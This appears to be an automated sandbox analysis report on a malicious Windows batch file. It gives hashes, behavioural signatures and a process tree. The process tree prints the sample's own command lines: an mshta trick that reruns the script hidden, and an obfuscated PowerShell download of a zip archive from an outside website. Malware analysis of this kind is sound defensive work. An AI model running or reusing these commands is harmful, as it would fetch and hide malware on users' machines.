Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
15/10/2024, 23:37
Static task
static1
Behavioral task
behavioral1
Sample
1[1].bat
Resource
win7-20240729-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
1[1].bat
Resource
win10v2004-20241007-en
22 signatures
150 seconds
General
-
Target
1[1].bat
-
Size
158KB
-
MD5
fe40ee4255d4757724cfca0bc65c2384
-
SHA1
d012699b807eb5b32909ffdc365897ecc2b46c15
-
SHA256
2f4252bb9695dd309f064d40d3fa45a122e6a44b3c442bff8d1ee1cd0a27c0fc
-
SHA512
b58e09d1052c5d2e636329bb31337b2addd14971fd2322b382489af238dd536118490f1e4cdd461b68d666a7b0837404014970c6b2245a1f805074b203111dc7
-
SSDEEP
3072:itkxMyL+YnNk57n2+d1zyPpwIjbrnHM7kZQ0u/swy/W:igJKKNk57fdB4pwIjbKkeGW
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2764 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2764 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1916 wrote to memory of 2300 1916 cmd.exe 31 PID 1916 wrote to memory of 2300 1916 cmd.exe 31 PID 1916 wrote to memory of 2300 1916 cmd.exe 31 PID 1916 wrote to memory of 2380 1916 cmd.exe 32 PID 1916 wrote to memory of 2380 1916 cmd.exe 32 PID 1916 wrote to memory of 2380 1916 cmd.exe 32 PID 2380 wrote to memory of 1644 2380 mshta.exe 33 PID 2380 wrote to memory of 1644 2380 mshta.exe 33 PID 2380 wrote to memory of 1644 2380 mshta.exe 33 PID 1644 wrote to memory of 2724 1644 cmd.exe 35 PID 1644 wrote to memory of 2724 1644 cmd.exe 35 PID 1644 wrote to memory of 2724 1644 cmd.exe 35 PID 1644 wrote to memory of 2760 1644 cmd.exe 36 PID 1644 wrote to memory of 2760 1644 cmd.exe 36 PID 1644 wrote to memory of 2760 1644 cmd.exe 36 PID 1644 wrote to memory of 2764 1644 cmd.exe 37 PID 1644 wrote to memory of 2764 1644 cmd.exe 37 PID 1644 wrote to memory of 2764 1644 cmd.exe 37
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\1[1].bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\system32\chcp.comchcp 650012⤵PID:2300
-
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("""C:\Users\Admin\AppData\Local\Temp\1_1_~1.BAT"" ::",0)(window.close)2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1_1_~1.BAT" ::"3⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\system32\chcp.comchcp 650014⤵PID:2724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.P~37, 1%w%jF,fXtX%k%Qi[NN,$AICSALx_$$%coMMONPRogRAmw6432:~1, 1%J1%dGtLVU%h%jQqkBx%w%ohVlWGB%W1%WWLhu%h%pRJZg%p%tRQR,Bj%s%dLQP?g%S1%XVlPzC%d%])b#j?%w%ipATPi_%k%GoA$sjtXRUWldbsveEsiUdSjdtF])g$%a%zN[h$P::FWfQj3f9.zip') "4⤵PID:2760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
-